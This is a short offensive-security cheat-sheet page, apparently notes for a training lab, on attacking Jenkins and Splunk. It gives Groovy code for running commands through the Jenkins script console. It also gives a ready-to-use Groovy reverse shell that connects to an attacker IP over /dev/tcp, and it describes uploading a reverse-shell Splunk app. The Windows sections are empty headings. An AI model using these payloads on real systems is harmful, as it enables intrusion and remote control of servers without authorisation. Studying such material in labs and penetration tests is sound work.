Application Attacks
Various Application Attacks
This page covers attacks on applications such as:
Jenkins
Splunk
Jenkins
After getting access to the console page, we can get RCE via http://jenkins.inlanefreight.local:8000/script and write Groovy code
Linux RCE
def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println soutLinux Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()Windows RCE
Windows Reverse Shell
Splunk
Reverse Shell using Splunk: https://github.com/0xjpuff/reverse_shell_splunk
This allows us to create an application which runs our commands on the server, and does the reverse connection
inputs.conf
run.bat
rev.py
Create the Splunk application
Start a reverse shell on our machine and upload the file via Install app from file in the Splunk UI
Last updated